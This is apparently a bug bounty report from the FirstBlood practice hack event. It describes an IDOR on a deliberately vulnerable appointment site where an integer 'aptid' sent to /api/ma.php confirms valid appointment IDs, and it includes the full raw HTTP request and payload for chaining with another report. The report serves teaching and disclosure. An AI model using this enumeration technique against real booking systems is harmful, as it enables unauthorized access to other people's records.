FirstBlood-#129IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel



On 2021-05-10, jpdev reported:

Summary

Using the aptid paramater found on manageappointment.php, you can use this in place of the id parameter this will ONLY confirm that the numerical id is valid and returns a success message. It does not cancel the appointment. If you do not have access to the drpanel you can you use this bug in a bug chain to amend the messages on the appointment see report 127.

Example of its use in a chain:

Use the below to confirm the id is valid, with the id perform the attack referenced in report id = 127 https://www.bugbountyhunter.com/hackevents/report?id=127

Request

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10

act=cancel&aptid=56911904

P2 High

Endpoint: POST /api/ma.php

Parameter: aptid=

Payload: 56911904


FirstBlood ID: 6
Vulnerability Type: IDOR

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.